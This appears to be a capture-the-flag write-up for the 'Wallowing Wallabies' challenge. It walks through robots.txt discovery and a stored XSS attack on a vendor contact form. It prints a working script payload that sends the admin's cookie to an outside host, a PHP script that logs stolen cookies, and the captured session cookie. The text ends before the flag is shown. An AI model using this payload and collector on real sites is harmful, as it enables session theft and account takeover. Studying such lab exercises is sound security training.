Wallowing Wallabies provides enterprise contract management - we'd like to find out how easy it is to perform corporate espionage against them.
We've got web page with no visible navigation or form except Home page:
Quick look at robots.txt reveals some hidden content:
User-agent: *
Disallow: /deep-blue-sea/
Disallow: /deep-blue-sea/team/
# Yes, these are alphabet puns :)
Disallow: /deep-blue-sea/team/characters
Disallow: /deep-blue-sea/team/paragraphs
Disallow: /deep-blue-sea/team/lines
Disallow: /deep-blue-sea/team/runes
Disallow: /deep-blue-sea/team/vendors
Web page at /deep-blue-sea/team/vendors contains form with two fields:
Text field was vulnerable to XSS and allows to put payload with simple JavaScript to steal cookie:
<script src="bootstrap.min.js">
</script>
<script>document.write('<img src="http://sword.x10host.com/?c='+document.cookie+'"/>');
</script>This payload was saved in message sent to site admin. At http://sword.x10host.com/ simple PHP script saves stolen cookie:
<?php
if (isset($_GET["c"])) {
$cookie = $_GET["c"];
file_put_contents("cookies.txt", $cookie);
}After a couple of minutes someone "read" message and cookies.txt file on sword.x10host.com contains cookie:
green-mountains=eyJub25jZSI6ImUxNjgwMjcyYTcxNDE3MjMiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MjAzMTg2OH0=|1462031865|d985a99f12846cd73da3b9b01b3b921fd15512e3
Refresh of Wallowing Wallabies page with stolen cookie revealed the flag:
